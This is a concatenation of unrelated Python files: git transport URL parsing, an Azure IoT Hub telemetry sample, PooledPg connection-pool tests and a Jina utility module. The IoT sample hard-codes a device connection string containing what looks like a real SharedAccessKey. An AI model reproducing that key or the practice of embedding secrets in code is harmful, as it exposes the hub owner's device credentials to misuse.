:param thin_packs: Whether or not thin packs should be retrieved
:param report_activity: Optional callback for reporting transport
activity.
:return: Tuple with client instance and relative path.
"""
parsed = urlparse.urlparse(url)
if parsed.scheme == 'git':
return (TCPGitClient(parsed.hostname, port=parsed.port, **kwargs),
parsed.path)
elif parsed.scheme == 'git+ssh':
path = parsed.path
if path.startswith('/'):
path = parsed.path[1:]
return SSHGitClient(parsed.hostname, port=parsed.port,
username=parsed.username, **kwargs), path
elif parsed.scheme in ('http', 'https'):
return HttpGitClient(urlparse.urlunparse(parsed), config=config,
**kwargs), parsed.path
elif parsed.scheme == 'file':
return default_local_git_client_cls(**kwargs), parsed.path
raise ValueError("unknown scheme '%s'" % parsed.scheme)
def get_transport_and_path(location, **kwargs):
"""Obtain a git client from a URL.
:param location: URL or path
:param config: Optional config object
:param thin_packs: Whether or not thin packs should be retrieved
:param report_activity: Optional callback for reporting transport
activity.
:return: Tuple with client instance and relative path.
"""
# First, try to parse it as a URL
try:
return get_transport_and_path_from_url(location, **kwargs)
except ValueError:
pass
if (sys.platform == 'win32' and
location[0].isalpha() and location[1:3] == ':\\'):
# Windows local path
return default_local_git_client_cls(**kwargs), location
if ':' in location and not '@' in location:
# SSH with no user@, zero or one leading slash.
(hostname, path) = location.split(':')
return SSHGitClient(hostname, **kwargs), path
elif '@' in location and ':' in location:
# SSH with user@host:foo.
user_host, path = location.split(':')
user, host = user_host.rsplit('@')
return SSHGitClient(host, username=user, **kwargs), path
# Otherwise, assume it's a local path.
return default_local_git_client_cls(**kwargs), location
|
telemetry_listener.py
|
# Copyright (c) Microsoft. All rights reserved.
# Licensed under the MIT license. See LICENSE file in the project root for full license information.
import random
import time
import threading
# Using the Python Device SDK for IoT Hub:
# https://github.com/Azure/azure-iot-sdk-python
# The sample connects to a device-specific MQTT endpoint on your IoT Hub.
from azure.iot.device import IoTHubDeviceClient, Message, MethodResponse
# The device connection string to authenticate the device with your IoT hub.
# Using the Azure CLI:
# az iot hub device-identity show-connection-string --hub-name {YourIoTHubName} --device-id MyNodeDevice --output table
CONNECTION_STRING = "HostName=University-IoT-Cart.azure-devices.net;DeviceId=Pi_Envirnoment;SharedAccessKey=TWnLYcXf/sxYoacZry0akx7knPOa2gSojrkZ7oyBfX0="
# Define the JSON message to send to IoT Hub.
TEMPERATURE = 20.0
HUMIDITY = 60
MSG_TXT = '{{"temperature": {temperature},"humidity": {humidity}}}'
INTERVAL = 1
def iothub_client_init():
# Create an IoT Hub client
client = IoTHubDeviceClient.create_from_connection_string(CONNECTION_STRING)
return client
def device_method_listener(device_client):
global INTERVAL
while True:
method_request = device_client.receive_method_request()
print (
"\nMethod callback called with:\nmethodName = {method_name}\npayload = {payload}".format(
method_name=method_request.name,
payload=method_request.payload
)
)
if method_request.name == "SetTelemetryInterval":
try:
INTERVAL = int(method_request.payload)
except ValueError:
response_payload = {"Response": "Invalid parameter"}
response_status = 400
else:
response_payload = {"Response": "Executed direct method {}".format(method_request.name)}
response_status = 200
else:
response_payload = {"Response": "Direct method {} not defined".format(method_request.name)}
response_status = 404
method_response = MethodResponse(method_request.request_id, response_status, payload=response_payload)
device_client.send_method_response(method_response)
def iothub_client_telemetry_sample_run():
try:
client = iothub_client_init()
print ( "IoT Hub device sending periodic messages, press Ctrl-C to exit" )
# Start a thread to listen
device_method_thread = threading.Thread(target=device_method_listener, args=(client,))
device_method_thread.daemon = True
device_method_thread.start()
while True:
# Build the message with simulated telemetry values.
temperature = TEMPERATURE + (random.random() * 15)
humidity = HUMIDITY + (random.random() * 20)
msg_txt_formatted = MSG_TXT.format(temperature=temperature, humidity=humidity)
message = Message(msg_txt_formatted)
# Add a custom application property to the message.
# An IoT hub can filter on these properties without access to the message body.
if temperature > 30:
message.custom_properties["temperatureAlert"] = "true"
else:
message.custom_properties["temperatureAlert"] = "false"
# Send the message.
print( "Sending message: {}".format(message) )
client.send_message(message)
print( "Message sent" )
time.sleep(INTERVAL)
except KeyboardInterrupt:
print ( "IoTHubClient sample stopped" )
if __name__ == '__main__':
print ( "IoT Hub Quickstart #2 - Simulated device" )
print ( "Press Ctrl-C to exit" )
iothub_client_telemetry_sample_run()
|
test_pooled_pg.py
|
"""Test the PooledPg module.
Note:
We don't test performance here, so the test does not predicate
whether PooledPg actually will help in improving performance or not.
We also assume that the underlying SteadyPg connections are tested.
Copyright and credit info:
* This test was contributed by Christoph Zwerschke
"""
import unittest
from . import mock_pg # noqa
from dbutils.pooled_pg import PooledPg, InvalidConnection, TooManyConnections
class TestPooledPg(unittest.TestCase):
def test_version(self):
from dbutils import __version__, pooled_pg
self.assertEqual(pooled_pg.__version__, __version__)
self.assertEqual(PooledPg.version, __version__)
def test_create_connection(self):
pool = PooledPg(
1, 1, 0, False, None, None, False,
'PooledPgTestDB', user='PooledPgTestUser')
self.assertTrue(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 1)
self.assertTrue(hasattr(pool, '_maxusage'))
self.assertIsNone(pool._maxusage)
self.assertTrue(hasattr(pool, '_setsession'))
self.assertIsNone(pool._setsession)
self.assertTrue(hasattr(pool, '_reset'))
self.assertFalse(pool._reset)
db_con = pool._cache.get(0)
pool._cache.put(db_con, 0)
from dbutils.steady_pg import SteadyPgConnection
self.assertTrue(isinstance(db_con, SteadyPgConnection))
db = pool.connection()
self.assertEqual(pool._cache.qsize(), 0)
self.assertTrue(hasattr(db, '_con'))
self.assertEqual(db._con, db_con)
self.assertTrue(hasattr(db, 'query'))
self.assertTrue(hasattr(db, 'num_queries'))
self.assertEqual(db.num_queries, 0)
self.assertTrue(hasattr(db, '_maxusage'))
self.assertEqual(db._maxusage, 0)
self.assertTrue(hasattr(db, '_setsession_sql'))
self.assertIsNone(db._setsession_sql)
self.assertTrue(hasattr(db, 'dbname'))
self.assertEqual(db.dbname, 'PooledPgTestDB')
self.assertTrue(hasattr(db, 'user'))
self.assertEqual(db.user, 'PooledPgTestUser')
db.query('select test')
self.assertEqual(db.num_queries, 1)
pool = PooledPg(1)
db = pool.connection()
self.assertTrue(hasattr(db, 'dbname'))
self.assertIsNone(db.dbname)
self.assertTrue(hasattr(db, 'user'))
self.assertIsNone(db.user)
self.assertTrue(hasattr(db, 'num_queries'))
self.assertEqual(db.num_queries, 0)
pool = PooledPg(0, 0, 0, False, 3, ('set datestyle',),)
self.assertEqual(pool._maxusage, 3)
self.assertEqual(pool._setsession, ('set datestyle',))
db = pool.connection()
self.assertEqual(db._maxusage, 3)
self.assertEqual(db._setsession_sql, ('set datestyle',))
def test_close_connection(self):
pool = PooledPg(
0, 1, 0, False, None, None, False,
'PooledPgTestDB', user='PooledPgTestUser')
db = pool.connection()
self.assertTrue(hasattr(db, '_con'))
db_con = db._con
from dbutils.steady_pg import SteadyPgConnection
self.assertTrue(isinstance(db_con, SteadyPgConnection))
self.assertTrue(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 0)
self.assertEqual(db.num_queries, 0)
db.query('select test')
self.assertEqual(db.num_queries, 1)
db.close()
self.assertRaises(InvalidConnection, getattr, db, 'num_queries')
db = pool.connection()
self.assertTrue(hasattr(db, 'dbname'))
self.assertEqual(db.dbname, 'PooledPgTestDB')
self.assertTrue(hasattr(db, 'user'))
self.assertEqual(db.user, 'PooledPgTestUser')
self.assertEqual(db.num_queries, 1)
db.query('select test')
self.assertEqual(db.num_queries, 2)
db = pool.connection()
self.assertEqual(pool._cache.qsize(), 1)
self.assertEqual(pool._cache.get(0), db_con)
def test_min_max_cached(self):
pool = PooledPg(3)
self.assertTrue(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 3)
cache = [pool.connection() for i in range(3)]
self.assertEqual(pool._cache.qsize(), 0)
for i in range(3):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 3)
for i in range(6):
cache.append(pool.connection())
self.assertEqual(pool._cache.qsize(), 0)
for i in range(6):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 6)
pool = PooledPg(3, 4)
self.assertTrue(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 3)
cache = [pool.connection() for i in range(3)]
self.assertEqual(pool._cache.qsize(), 0)
for i in range(3):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 3)
for i in range(6):
cache.append(pool.connection())
self.assertEqual(pool._cache.qsize(), 0)
for i in range(6):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 4)
pool = PooledPg(3, 2)
self.assertTrue(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 3)
cache = [pool.connection() for i in range(4)]
self.assertEqual(pool._cache.qsize(), 0)
for i in range(4):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 3)
pool = PooledPg(2, 5)
self.assertTrue(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 2)
cache = [pool.connection() for i in range(10)]
self.assertEqual(pool._cache.qsize(), 0)
for i in range(10):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 5)
def test_max_connections(self):
from dbutils.pooled_pg import TooManyConnections
pool = PooledPg(1, 2, 3)
self.assertEqual(pool._cache.qsize(), 1)
cache = [pool.connection() for i in range(3)]
self.assertEqual(pool._cache.qsize(), 0)
self.assertRaises(TooManyConnections, pool.connection)
pool = PooledPg(0, 1, 1, False)
self.assertEqual(pool._blocking, 0)
self.assertEqual(pool._cache.qsize(), 0)
db = pool.connection()
self.assertEqual(pool._cache.qsize(), 0)
self.assertRaises(TooManyConnections, pool.connection)
del db
del cache
pool = PooledPg(1, 2, 1)
self.assertEqual(pool._cache.qsize(), 1)
cache = [pool.connection()]
self.assertEqual(pool._cache.qsize(), 0)
cache.append(pool.connection())
self.assertEqual(pool._cache.qsize(), 0)
self.assertRaises(TooManyConnections, pool.connection)
pool = PooledPg(3, 2, 1, False)
self.assertEqual(pool._cache.qsize(), 3)
cache = [pool.connection() for i in range(3)]
self.assertEqual(len(cache), 3)
self.assertEqual(pool._cache.qsize(), 0)
self.assertRaises(TooManyConnections, pool.connection)
pool = PooledPg(1, 1, 1, True)
self.assertEqual(pool._blocking, 1)
self.assertEqual(pool._cache.qsize(), 1)
db = pool.connection()
self.assertEqual(pool._cache.qsize(), 0)
def connection():
pool.connection().query('set thread')
from threading import Thread
thread = Thread(target=connection)
thread.start()
thread.join(0.1)
self.assertTrue(thread.is_alive())
self.assertEqual(pool._cache.qsize(), 0)
session = db._con.session
self.assertEqual(session, [])
del db
thread.join(0.1)
self.assertFalse(thread.is_alive())
self.assertEqual(pool._cache.qsize(), 1)
db = pool.connection()
self.assertEqual(pool._cache.qsize(), 0)
self.assertEqual(session, ['thread'])
del db
def test_one_thread_two_connections(self):
pool = PooledPg(2)
db1 = pool.connection()
for i in range(5):
db1.query('select test')
db2 = pool.connection()
self.assertNotEqual(db1, db2)
self.assertNotEqual(db1._con, db2._con)
for i in range(7):
db2.query('select test')
self.assertEqual(db1.num_queries, 5)
self.assertEqual(db2.num_queries, 7)
del db1
db1 = pool.connection()
self.assertNotEqual(db1, db2)
self.assertNotEqual(db1._con, db2._con)
self.assertTrue(hasattr(db1, 'query'))
for i in range(3):
db1.query('select test')
self.assertEqual(db1.num_queries, 8)
db2.query('select test')
self.assertEqual(db2.num_queries, 8)
def test_three_threads_two_connections(self):
pool = PooledPg(2, 2, 2, True)
from queue import Queue, Empty
queue = Queue(3)
def connection():
try:
queue.put(pool.connection(), 1, 1)
except TypeError:
queue.put(pool.connection(), 1)
from threading import Thread
for i in range(3):
Thread(target=connection).start()
try:
db1 = queue.get(1, 1)
db2 = queue.get(1, 1)
except TypeError:
db1 = queue.get(1)
db2 = queue.get(1)
db1_con = db1._con
db2_con = db2._con
self.assertNotEqual(db1, db2)
self.assertNotEqual(db1_con, db2_con)
try:
self.assertRaises(Empty, queue.get, 1, 0.1)
except TypeError:
self.assertRaises(Empty, queue.get, 0)
del db1
try:
db1 = queue.get(1, 1)
except TypeError:
db1 = queue.get(1)
self.assertNotEqual(db1, db2)
self.assertNotEqual(db1._con, db2._con)
self.assertEqual(db1._con, db1_con)
def test_reset_transaction(self):
pool = PooledPg(1)
db = pool.connection()
db.begin()
con = db._con
self.assertTrue(con._transaction)
db.query('select test')
self.assertEqual(con.num_queries, 1)
db.close()
self.assertIs(pool.connection()._con, con)
self.assertFalse(con._transaction)
self.assertEqual(con.session, ['begin', 'rollback'])
self.assertEqual(con.num_queries, 1)
pool = PooledPg(1, reset=1)
db = pool.connection()
db.begin()
con = db._con
self.assertTrue(con._transaction)
self.assertEqual(con.session, ['rollback', 'begin'])
db.query('select test')
self.assertEqual(con.num_queries, 1)
db.close()
self.assertIs(pool.connection()._con, con)
self.assertFalse(con._transaction)
self.assertEqual(
con.session, ['rollback', 'begin', 'rollback', 'rollback'])
self.assertEqual(con.num_queries, 1)
pool = PooledPg(1, reset=2)
db = pool.connection()
db.begin()
con = db._con
self.assertTrue(con._transaction)
self.assertEqual(con.session, ['begin'])
db.query('select test')
self.assertEqual(con.num_queries, 1)
db.close()
self.assertIs(pool.connection()._con, con)
self.assertFalse(con._transaction)
self.assertEqual(con.session, [])
self.assertEqual(con.num_queries, 0)
def test_context_manager(self):
pool = PooledPg(1, 1, 1)
with pool.connection() as db:
db_con = db._con._con
db.query('select test')
self.assertEqual(db_con.num_queries, 1)
self.assertRaises(TooManyConnections, pool.connection)
with pool.connection() as db:
db_con = db._con._con
db.query('select test')
self.assertEqual(db_con.num_queries, 2)
self.assertRaises(TooManyConnections, pool.connection)
if __name__ == '__main__':
unittest.main()
|
helper.py
|
import asyncio
import functools
import json
import math
import os
import random
import re
import sys
import threading
import time
import uuid
import warnings
from argparse import ArgumentParser, Namespace
from contextlib import contextmanager
from datetime import datetime
from itertools import islice
from pathlib import Path
from types import SimpleNamespace
from typing import (
Tuple,
Optional,
Iterator,
Any,
Union,
List,
Dict,
Set,
Sequence,
Iterable,
)
__all__ = [
'batch_iterator',
'parse_arg',
'random_port',
'random_identity',
'random_uuid',
'expand_env_var',
'colored',
'ArgNamespace',
'is_valid_local_config_source',
'cached_property',
'typename',
'get_public_ip',
'get_internal_ip',
'convert_tuple_to_list',
'run_async',
'deprecated_alias',
'countdown',
]
def deprecated_alias(**aliases):
"""
Usage, kwargs with key as the deprecated arg name and value be a tuple, (new_name, deprecate_level).
With level 0 means warning, level 1 means exception.
For example:
.. highlight:: python
.. code-block:: python
@deprecated_alias(input_fn=('inputs', 0), buffer=('input_fn', 0), callback=('on_done', 1), output_fn=('on_done', 1))
:param aliases: maps aliases to new arguments
:return: wrapper
"""
from .excepts import NotSupportedError
def _rename_kwargs(func_name: str, kwargs, aliases):
"""
Raise warnings or exceptions for deprecated arguments.
:param func_name: Name of the function.
:param kwargs: key word arguments from the function which is decorated.
:param aliases: kwargs with key as the deprecated arg name and value be a tuple, (new_name, deprecate_level).
"""
for alias, new_arg in aliases.items():
if not isinstance(new_arg, tuple):
raise ValueError(
f'{new_arg} must be a tuple, with first element as the new name, '
f'second element as the deprecated level: 0 as warning, 1 as exception'
)
if alias in kwargs:
new_name, dep_level = new_arg
if new_name in kwargs:
raise NotSupportedError(
f'{func_name} received both {alias} and {new_name}'
)
if dep_level == 0:
warnings.warn(
f'`{alias}` is renamed to `{new_name}` in `{func_name}()`, the usage of `{alias}` is '
f'deprecated and will be removed in the next version.',
DeprecationWarning,
)
kwargs[new_name] = kwargs.pop(alias)
elif dep_level == 1:
raise NotSupportedError(f'{alias} has been renamed to `{new_name}`')
def deco(f):
"""
Set Decorator function.
:param f: function the decorator is used for
:return: wrapper
"""
@functools.wraps(f)
def wrapper(*args, **kwargs):
"""
Set wrapper function.
:param args: wrapper arguments
:param kwargs: wrapper key word arguments
:return: result of renamed function.
"""
_rename_kwargs(f.__name__, kwargs, aliases)
return f(*args, **kwargs)
return wrapper
return deco
def get_readable_size(num_bytes: Union[int, float]) -> str:
"""
Transform the bytes into readable value with different units (e.g. 1 KB, 20 MB, 30.1 GB).
:param num_bytes: Number of bytes.
:return: Human readable string representation.
"""
num_bytes = int(num_bytes)
if num_bytes < 1024:
return f'{num_bytes} Bytes'
elif num_bytes < 1024 ** 2:
return f'{num_bytes / 1024:.1f} KB'
elif num_bytes < 1024 ** 3:
return f'{num_bytes / (1024 ** 2):.1f} MB'
else:
return f'{num_bytes / (1024 ** 3):.1f} GB'
def call_obj_fn(obj, fn: str):
"""
Get a named attribute from an object; getattr(obj, 'fn') is equivalent to obj.fn.
:param obj: Target object.
:param fn: Desired attribute.
"""
if obj is not None and hasattr(obj, fn):
getattr(obj, fn)()
def touch_dir(base_dir: str) -> None:
"""
Create a directory from given path if it doesn't exist.
:param base_dir: Path of target path.
"""
if not os.path.exists(base_dir):
os.makedirs(base_dir)
def batch_iterator(
data: Iterable[Any],
batch_size: int,
axis: int = 0,
yield_slice: bool = False,
yield_dict: bool = False,
) -> Iterator[Any]:
"""
Get an iterator of batches of data.
For example:
.. highlight:: python
.. code-block:: python
for batch in batch_iterator(data, batch_size, split_over_axis, yield_slice=yield_slice):
# Do something with batch
:param data: Data source.
:param batch_size: Size of one batch.
:param axis: Determine which axis to iterate for np.ndarray data.
:param yield_slice: Return tuple type of data if True else return np.ndarray type.
:param yield_dict: Return dict type of data if True else return tuple type.
:yield: data
:return: An Iterator of batch data.
"""
import numpy as np
if not batch_size or batch_size <= 0:
yield data
return
if isinstance(data, np.ndarray):
_l = data.shape[axis]
_d = data.ndim
sl = [slice(None)] * _d
if batch_size >= _l:
if yield_slice:
yield tuple(sl)
else:
yield data
return
for start in range(0, _l, batch_size):
end = min(_l, start + batch_size)
sl[axis] = slice(start, end)
if yield_slice:
yield tuple(sl)
else:
yield data[tuple(sl)]
elif isinstance(data, Sequence):
if batch_size >= len(data):
yield data
return
for _ in range(0, len(data), batch_size):
yield data[_ : _ + batch_size]
elif isinstance(data, Iterable):
# as iterator, there is no way to know the length of it
while True:
if yield_dict:
chunk = dict(islice(data, batch_size))
else:
chunk = tuple(islice(data, batch_size))
if not chunk:
return
yield chunk
else:
raise TypeError(f'unsupported type: {type(data)}')
def parse_arg(v: str) -> Optional[Union[bool, int, str, list, float]]:
"""
Parse the arguments from string to `Union[bool, int, str, list, float]`.
:param v: The string of arguments
:return: The parsed arguments list.
"""
m = re.match(r'^[\'"](.*)[\'"]$', v)
if m:
return m.group(1)
if v.startswith('[') and v.endswith(']'):
# function args must be immutable tuples not list
tmp = v.replace('[', '').replace(']', '').strip().split(',')
if len(tmp) > 0:
return [parse_arg(vv.strip()) for vv in tmp]
else:
return []
try:
v = int(v) # parse int parameter
except ValueError:
try:
v = float(v) # parse float parameter
except ValueError:
if len(v) == 0:
# ignore it when the parameter is empty
v = None
elif v.lower() == 'true': # parse boolean parameter
v = True
elif v.lower() == 'false':
v = False
return v
def countdown(t: int, reason: str = 'I am blocking this thread') -> None:
"""
Display the countdown in console.
For example:
.. highlight:: python
.. code-block:: python
countdown(10, reason=colored('re-fetch access token', 'cyan', attrs=['bold', 'reverse']))
:param t: Countdown time.
:param reason: A string message of reason for this Countdown.
"""
try:
sys.stdout.write('\n')
sys.stdout.flush()
while t > 0:
t -= 1
msg = f'⏳ {colored("%3d" % t, "yellow")}s left: {reason}'
sys.stdout.write(f'\r{msg}')
sys.stdout.flush()
time.sleep(1)
sys.stdout.write('\n')
sys.stdout.flush()
except KeyboardInterrupt:
sys.stdout.write('no more patience? good bye!')
_random_names = (
(
'first',
'great',
'local',
'small',
'right',
'large',
'young',
'early',
'major',
'clear',
'black',
'whole',
'third',
'white',
'short',
'human',
'royal',
'wrong',
'legal',
'final',
'close',
'total',
'prime',
'happy',
'sorry',
'basic',
'aware',
'ready',
'green',
'heavy',
'extra',
'civil',
'chief',
'usual',
'front',
'fresh',
'joint',
'alone',
'rural',
'light',
'equal',
'quiet',
'quick',
'daily',
'urban',
'upper',
'moral',
'vital',
'empty',
'brief',
),
(
'world',
'house',
'place',
'group',
'party',
'money',
'point',
'state',
'night',
'water',
'thing',
'order',
'power',
'court',
'level',
'child',
'south',
'staff',
'woman',
'north',
'sense',
'death',
'range',
'table',
'trade',
'study',
'other',
'price',
'class',
'union',
'value',
'paper',
'right',
'voice',
'stage',
'light',
'march',
'board',
'month',
'music',
'field',
'award',
'issue',
'basis',
'front',
'heart',
'force',
'model',
'space',
'peter',
),
)
def random_name() -> str:
"""
Generate a random name from list.
:return: A Random name.
"""
return '_'.join(random.choice(_random_names[j]) for j in range(2))
def random_port() -> Optional[int]:
"""
Get a random available port number from '49153' to '65535'.
:return: A random port.
"""
import threading
import multiprocessing
from contextlib import closing
import socket
def _get_port(port=0):
with multiprocessing.Lock():
with threading.Lock():
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
try:
s.bind(('', port))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return s.getsockname()[1]
except OSError:
pass
_port = None
if 'JINA_RANDOM_PORTS' in os.environ:
min_port = int(os.environ.get('JINA_RANDOM_PORT_MIN', '49153'))
max_port = int(os.environ.get('JINA_RANDOM_PORT_MAX', '65535'))
all_ports = list(range(min_port, max_port + 1))
random.shuffle(all_ports)
for _port in all_ports:
if _get_port(_port) is not None:
break
else:
raise OSError(
f'Couldn\'t find an available port in [{min_port}, {max_port}].'
)
else:
_port = _get_port()
return int(_port)
def random_identity(use_uuid1: bool = False) -> str:
"""
Generate random UUID.
..note::
A MAC address or time-based ordering (UUID1) can afford increased database performance, since it's less work
to sort numbers closer-together than those distributed randomly (UUID4) (see here).
A second related issue, is that using UUID1 can be useful in debugging, even if origin data is lost or not
explicitly stored.
:param use_uuid1: use UUID1 instead of UUID4. This is the default Document ID generator.
:return: A random UUID.
"""
return str(random_uuid(use_uuid1))
def random_uuid(use_uuid1: bool = False) -> uuid.UUID:
"""
Get a random UUID.
:param use_uuid1: Use UUID1 if True, else use UUID4.
:return: A random UUID.
"""
return uuid.uuid1() if use_uuid1 else uuid.uuid4()
def expand_env_var(v: str) -> Optional[Union[bool, int, str, list, float]]:
"""
Expand the environment variables.
:param v: String of environment variables.
:return: Parsed environment variables.
"""
if isinstance(v, str):
return parse_arg(os.path.expandvars(v))
else:
return v
def expand_dict(
d: Dict, expand_fn=expand_env_var, resolve_cycle_ref=True
) -> Dict[str, Any]:
"""
Expand variables from YAML file.
:param d: Target Dict.
:param expand_fn: Parsed environment variables.
:param resolve_cycle_ref: Defines if cyclic references should be resolved.
:return: Expanded variables.
"""
expand_map = SimpleNamespace()
pat = re.compile(r'{.+}|\$[a-zA-Z0-9_]*\b')
def _scan(sub_d: Union[Dict, List], p):
if isinstance(sub_d, dict):
for k, v in sub_d.items():
if isinstance(v, dict):
p.__dict__[k] = SimpleNamespace()
_scan(v, p.__dict__[k])
elif isinstance(v, list):
p.__dict__[k] = list()
_scan(v, p.__dict__[k])
else:
p.__dict__[k] = v
elif isinstance(sub_d, list):
for idx, v in enumerate(sub_d):
if isinstance(v, dict):
p.append(SimpleNamespace())
_scan(v, p[idx])
elif isinstance(v, list):
p.append(list())
_scan(v, p[idx])
else:
p.append(v)
def _replace(sub_d: Union[Dict, List], p):
if isinstance(sub_d, Dict):
for k, v in sub_d.items():
if isinstance(v, (dict, list)):
_replace(v, p.__dict__[k])
else:
if isinstance(v, str) and pat.findall(v):
sub_d[k] = _sub(v, p)
elif isinstance(sub_d, List):
for idx, v in enumerate(sub_d):
if isinstance(v, (dict, list)):
_replace(v, p[idx])
else:
if isinstance(v, str) and pat.findall(v):
sub_d[idx] = _sub(v, p)
def _sub(v, p):
if resolve_cycle_ref:
try:
v = v.format(root=expand_map, this=p)
except KeyError:
pass
return expand_fn(v)
_scan(d, expand_map)
_replace(d, expand_map)
return d
_ATTRIBUTES = {
'bold': 1,
'dark': 2,
'underline': 4,
'blink': 5,
'reverse': 7,
'concealed': 8,
}
_HIGHLIGHTS = {
'on_grey': 40,
'on_red': 41,
'on_green': 42,
'on_yellow': 43,
'on_blue': 44,
'on_magenta': 45,
'on_cyan': 46,
'on_white': 47,
}
_COLORS = {
'grey': 30,
'red': 31,
'green': 32,
'yellow': 33,
'blue': 34,
'magenta': 35,
'cyan': 36,
'white': 37,
}
_RESET = '\033[0m'
if os.name == 'nt':
os.system('color')
def colored(
text: str,
color: Optional[str] = None,
on_color: Optional[str] = None,
attrs: Optional[Union[str, list]] = None,
) -> str:
"""
Give the text with color.
:param text: The target text.
:param color: The color of text. Chosen from the following.
{
'grey': 30,
'red': 31,
'green': 32,
'yellow': 33,
'blue': 34,
'magenta': 35,
'cyan': 36,
'white': 37
}
:param on_color: The on_color of text. Chosen from the following.
{
'on_grey': 40,
'on_red': 41,
'on_green': 42,
'on_yellow': 43,
'on_blue': 44,
'on_magenta': 45,
'on_cyan': 46,
'on_white': 47
}
:param attrs: Attributes of color. Chosen from the following.
{
'bold': 1,
'dark': 2,
'underline': 4,
'blink': 5,
'reverse': 7,
'concealed': 8
}
:return: Colored text.
"""
if 'JINA_LOG_NO_COLOR' not in os.environ:
fmt_str = '\033[%dm%s'
if color:
text = fmt_str % (_COLORS[color], text)
if on_color:
text = fmt_str % (_HIGHLIGHTS[on_color], text)
if attrs:
if isinstance(attrs, str):
attrs = [attrs]
if isinstance(attrs, list):
for attr in attrs:
text = fmt_str % (_ATTRIBUTES[attr], text)
text += _RESET
return text
class ArgNamespace:
"""Helper function for argparse.Namespace object."""
@staticmethod
def kwargs2list(kwargs: Dict) -> List[str]:
"""
Convert dict to an argparse-friendly list.
:param kwargs: dictionary of key-values to be converted
:return: argument list
"""
args = []
from .executors import BaseExecutor
for k, v in kwargs.items():
k = k.replace('_', '-')
if v is not None:
if isinstance(v, bool):
if v:
args.append(f'--{k}')
elif isinstance(v, list): # for nargs
args.extend([f'--{k}', *(str(vv) for vv in v)])
elif isinstance(v, dict):
args.extend([f'--{k}', json.dumps(v)])
elif isinstance(v, type) and issubclass(v, BaseExecutor):
args.extend([f'--{k}', v.__name__])
else:
args.extend([f'--{k}', str(v)])
return args
@staticmethod
def kwargs2namespace(
kwargs: Dict[str, Union[str, int, bool]], parser: ArgumentParser
) -> Namespace:
"""
Convert dict to a namespace.
:param kwargs: dictionary of key-values to be converted
:param parser: the parser for building kwargs into a namespace
:return: argument list
"""
args = ArgNamespace.kwargs2list(kwargs)
try:
p_args, unknown_args = parser.parse_known_args(args)
except SystemExit:
raise ValueError(
f'bad arguments "{args}" with parser {parser}, '
'you may want to double check your args '
)
return p_args
@staticmethod
def get_parsed_args(
kwargs: Dict[str, Union[str, int, bool]], parser: ArgumentParser
) -> Tuple[List[str], Namespace, List[Any]]:
"""
Get all parsed args info in a dict.
:param kwargs: dictionary of key-values to be converted
:param parser: the parser for building kwargs into a namespace
:return: argument namespace, positional arguments and unknown arguments
"""
args = ArgNamespace.kwargs2list(kwargs)
try:
p_args, unknown_args = parser.parse_known_args(args)
if unknown_args:
from jina.logging.predefined import default_logger
default_logger.debug(
f'parser {typename(parser)} can not '
f'recognize the following args: {unknown_args}, '
f'they are ignored. if you are using them from a global args (e.g. Flow), '
f'then please ignore this message'
)
except SystemExit:
raise ValueError(
f'bad arguments "{args}" with parser {parser}, '
'you may want to double check your args '
)
return args, p_args, unknown_args
@staticmethod
def get_non_defaults_args(
args: Namespace, parser: ArgumentParser, taboo: Optional[Set[str]] = None
) -> Dict:
"""
Get non-default args in a dict.
:param args: the namespace to parse
:param parser: the parser for referring the default values
:param taboo: exclude keys in the final result
:return: non defaults
"""
if taboo is None:
taboo = set()
non_defaults = {}
_defaults = vars(parser.parse_args([]))
for k, v in vars(args).items():
if k in _defaults and k not in taboo and _defaults[k] != v:
non_defaults[k] = v
return non_defaults
@staticmethod
def flatten_to_dict(
args: Union[Dict[str, 'Namespace'], 'Namespace']
) -> Dict[str, Any]:
"""Convert argparse.Namespace to dict to be uploaded via REST.
:param args: namespace or dict or namespace to dict.
:return: pea args
"""
if isinstance(args, Namespace):
return vars(args)
elif isinstance(args, dict):
pea_args = {}
for k, v in args.items():
if isinstance(v, Namespace):
pea_args[k] = vars(v)
elif isinstance(v, list):
pea_args[k] = [vars(_) for _ in v]
else:
pea_args[k] = v
return pea_args
def is_valid_local_config_source(path: str) -> bool:
# TODO: this function must be refactored before 1.0 (Han 12.22)
"""
Check if the path is valid.
:param path: Local file path.
:return: True if the path is valid else False.
"""
try:
from .jaml import parse_config_source
parse_config_source(path)
return True
except FileNotFoundError:
return False
def get_full_version() -> Optional[Tuple[Dict, Dict]]:
"""
Get the version of libraries used in Jina and environment variables.
:return: Version information and environment variables
"""
from . import __version__, __proto_version__, __jina_env__, __resources_path__
from google.protobuf.internal import api_implementation
import os, zmq, numpy, google.protobuf, grpc, yaml
from grpc import _grpcio_metadata
import platform
from jina.logging.predefined import default_logger
try:
info = {
'jina': __version__,
'jina-proto': __proto_version__,
'jina-vcs-tag': os.environ.get('JINA_VCS_VERSION', '(unset)'),
'libzmq': zmq.zmq_version(),
'pyzmq': numpy.__version__,
'protobuf': google.protobuf.__version__,
'proto-backend': api_implementation._default_implementation_type,
'grpcio': getattr(grpc, '__version__', _grpcio_metadata.__version__),
'pyyaml': yaml.__version__,
'python': platform.python_version(),
'platform': platform.system(),
'platform-release': platform.release(),
'platform-version': platform.version(),
'architecture': platform.machine(),
'processor': platform.processor(),
'jina-resources': __resources_path__,
}
env_info = {k: os.getenv(k, '(unset)') for k in __jina_env__}
full_version = info, env_info
except Exception as e:
default_logger.error(str(e))
full_version = None
return full_version
def format_full_version_info(info: Dict, env_info: Dict) -> str:
"""
Format the version information.
:param info: Version information of Jina libraries.
:param env_info: The Jina environment variables.
:return: Formatted version information.
"""
version_info = '\n'.join(f'- {k:30s}{v}' for k, v in info.items())
env_info = '\n'.join(f'* {k:30s}{v}' for k, v in env_info.items())
